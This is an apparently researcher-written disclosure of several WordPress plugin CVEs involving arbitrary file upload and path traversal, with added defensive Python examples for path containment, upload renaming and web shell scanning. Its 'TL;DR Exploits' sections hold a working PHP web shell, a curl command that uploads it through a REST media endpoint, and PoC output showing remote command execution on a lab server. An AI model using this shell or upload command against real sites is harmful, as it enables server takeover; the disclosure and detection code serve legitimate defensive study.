CVE-2025-9216

The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to upload arbitrary files and gain remote code execution. The vulnerability stems from two security flaws: (1) the CSV import endpoint lacks proper file validation checks and permission checks, relying only on nonce verification for security, and (2) the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. This combination allows any authenticated user to extract the nonce from frontend pages and use it to upload PHP web shells via the storeengine_csv/import endpoint, effectively granting subscriber+ users the ability to execute arbitrary code on the server.

CVE-2025-9215

The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to download arbitrary files from the server, including sensitive system files, WordPress configuration files, and plugin source code. The vulnerability stems from the storeengine_csv/file_download endpoint lacking proper path sanitization and only relying on nonce verification for security, while the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. Note: This vulnerability requires the CSV Import/Export addon to be enabled by an administrator. Once enabled, this combination allows any authenticated user to extract the nonce from frontend pages and use it to download any file on the server via path traversal attacks, effectively granting subscriber+ users access to sensitive system and application files.
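The containment check that the file_download endpoint described above lacks, as an added example rather than StoreEngine's own code: a resolver that only serves files whose fully resolved path stays inside the export directory, probed against a constructed site tree (directory names and file contents are assumptions).

```python
import tempfile
from pathlib import Path
from typing import Optional

def resolve_download_path(base_dir: str, requested: str) -> Optional[Path]:
    """Map a user-supplied file name onto a file inside base_dir, or return None.

    Both sides are fully resolved (symlinks followed, '.' and '..' collapsed)
    before comparison, so '../wp-config.php', absolute paths and symlinks that
    point outside the export directory all fail the same containment test.
    """
    if not requested or "\x00" in requested or Path(requested).is_absolute():
        return None
    base = Path(base_dir).resolve()
    candidate = (base / requested).resolve()
    try:
        candidate.relative_to(base)   # raises ValueError when outside base
    except ValueError:
        return None
    if not candidate.is_file():
        return None
    return candidate

def demo() -> dict:
    """Build a constructed WordPress-like layout in a temp dir and probe the resolver.

    Returns {request: allowed?} so the behaviour can be checked by a caller
    without any further file I/O.
    """
    with tempfile.TemporaryDirectory() as root:
        site = Path(root)
        exports = site / "wp-content" / "uploads" / "csv-exports"   # assumed export dir
        exports.mkdir(parents=True)
        (exports / "orders.csv").write_text("id,total\n1,9.99\n")   # constructed export
        (site / "wp-config.php").write_text("<?php // constructed sample\n")
        requests = [
            "orders.csv",                        # legitimate export file
            "../../../wp-config.php",            # plain traversal out of the export dir
            "sub/../../../../wp-config.php",     # traversal through a non-existent subdir
            str(site / "wp-config.php"),         # absolute path
            "missing.csv",                       # inside base but not present
        ]
        return {r: resolve_download_path(str(exports), r) is not None for r in requests}
```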

CVE-2025-6085

The Make Connector plugin does not sanitize the file types in its REST API media uploads, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

cat << 'EOF' > shello.php
<?php    
    // Silence is golden
    if (!empty($_GET['cmd'])) {
        echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
    }
?>
EOF

curl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
  -H "IWC-API-KEY: YOURFRIENDLYKEYHERE" \
  -F "file=@shello.php" \
  -F "title=Hacker World" \
  -F "description=A test file" \
  -F "caption=Hacker Caption"

Leveraging the shell once it’s in the uploads folder:

CVE-2025-23968

The AI Bud plugin exposes a REST API endpoint /wp-json/ai-buddy/v1/wp/attachments that allows uploading files to the WordPress media library. The endpoint’s upload logic contains file renaming functionality that runs after file type validation and allows the attacker to rename the uploaded file to any extension (including .php), allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.
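The validate-then-rename ordering described for AI Bud, together with the missing file type checks in the Make Connector entry above, modelled as an added Python example (not any plugin's code; the allow-list and function names are assumptions): the vulnerable order beside a hardened variant that validates the final stored name and pins its extension to the one that passed validation.

```python
import posixpath
from typing import Optional

# Constructed allow-list for a media upload endpoint (assumption, not a plugin's list).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "webp", "pdf", "csv"}

def extension_of(name: str) -> str:
    """Text after the last dot, lower-cased; '' when the name has no dot."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""

def is_allowed_name(name: str) -> bool:
    """Allow-list check on the bare file name (directory parts are stripped first)."""
    base = posixpath.basename(name.replace("\\", "/"))
    if base in ("", ".", "..") or "\x00" in base:
        return False
    return extension_of(base) in ALLOWED_EXTENSIONS

def store_vulnerable(uploaded_name: str, rename_to: Optional[str] = None) -> Optional[str]:
    """Validate, then rename: the check only ever sees the name the client uploaded,
    so a rename value applied afterwards is stored unexamined (the AI Bud ordering)."""
    if not is_allowed_name(uploaded_name):
        return None
    return rename_to or uploaded_name

def store_hardened(uploaded_name: str, rename_to: Optional[str] = None) -> Optional[str]:
    """Validate the uploaded name, then derive the stored name so that a rename can
    only change the stem; the extension stays the one that passed validation."""
    if not is_allowed_name(uploaded_name):
        return None
    final = posixpath.basename((rename_to or uploaded_name).replace("\\", "/"))
    stem = final.rsplit(".", 1)[0] if "." in final else final
    # One extension only: dots inside the stem are neutralised so the web server never
    # sees a second, possibly handler-mapped, extension such as in "shell.php.png".
    stem = stem.replace(".", "_").strip("_")
    if not stem:
        return None
    return f"{stem}.{extension_of(uploaded_name)}"
```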

TL;DR Exploits

A POC cve-2025-23968.py is provided to demonstrate an administrator uploading a web shell named shell.php.

CVE-2025-6586

The Download Plugin does not sanitize the file types of the dpwap_plugin_locInstall function exposed via the mul_upload admin page, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC cve-2025-6586.py is provided to demonstrate an administrator uploading a web shell named shell.php.

python3 cve-2025-6586.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
Web Shell Location: https://lab1.hacker/wp-content/uploads/dpwap_logs/files/tmp/shell.php

Executing test command: ip addr
    <pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
        valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
        valid_lft 75221sec preferred_lft 75221sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute
        valid_lft 86354sec preferred_lft 14354sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link
        valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
        valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link
        valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:77:47:94:a5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
        valid_lft forever preferred_lft forever
</pre>
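What a drop like the one in the output above leaves behind is a PHP file under wp-content/uploads, and an added detection example (not from the PoC or the plugin) can find it: a scanner that flags executable extensions anywhere in a file name and PHP open tags inside file content, run over a constructed uploads tree that mirrors the dpwap_logs path shown above.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Extensions a PHP-enabled web server may execute; none belong in a media library.
EXEC_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

def suspicious_upload(path: Path) -> List[str]:
    """Return the reasons a file under wp-content/uploads looks like server-side code."""
    reasons: List[str] = []
    parts = path.name.lower().split(".")[1:]     # every extension, not just the last
    if EXEC_EXTENSIONS.intersection(parts):
        reasons.append("executable extension")
    if path.name.lower() == ".htaccess":         # handler overrides have no place here either
        reasons.append("htaccess in uploads")
    try:
        head = path.read_bytes()[:4096]          # an open tag near the top is enough
    except OSError:
        return reasons
    if PHP_TAG.search(head):
        reasons.append("php open tag in content")
    return reasons

def scan_uploads(uploads_dir: str) -> List[Tuple[str, List[str]]]:
    """Walk the uploads tree and return (relative path, reasons) for every hit."""
    root = Path(uploads_dir)
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            reasons = suspicious_upload(p)
            if reasons:
                hits.append((p.relative_to(root).as_posix(), reasons))
    return hits

def demo() -> Dict[str, List[str]]:
    """Constructed uploads tree: a clean image, a dropped shell on the path seen above,
    and an image-looking file carrying a PHP tag. Returns {relative path: reasons}."""
    with tempfile.TemporaryDirectory() as root:
        up = Path(root)
        (up / "2025" / "09").mkdir(parents=True)
        (up / "2025" / "09" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed jpeg bytes")
        (up / "2025" / "09" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n<?php echo 2; ?>")
        (up / "dpwap_logs" / "files" / "tmp").mkdir(parents=True)
        (up / "dpwap_logs" / "files" / "tmp" / "shell.php").write_bytes(b"<?php echo 1; ?>")
        return dict(scan_uploads(root))
```

Content-based hits such as the PNG case are worth keeping even when the extension is harmless, since a later rename or handler misconfiguration is all that separates them from the shell.php case.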

Details

The dpwap_plugin_multiple_upload_func function is exposed in the mul_upload admin page. On line 80 of /wp-content/plugins/download-plugin/app/Plugins/Base.php the function includes multiple_upload_plugin.php.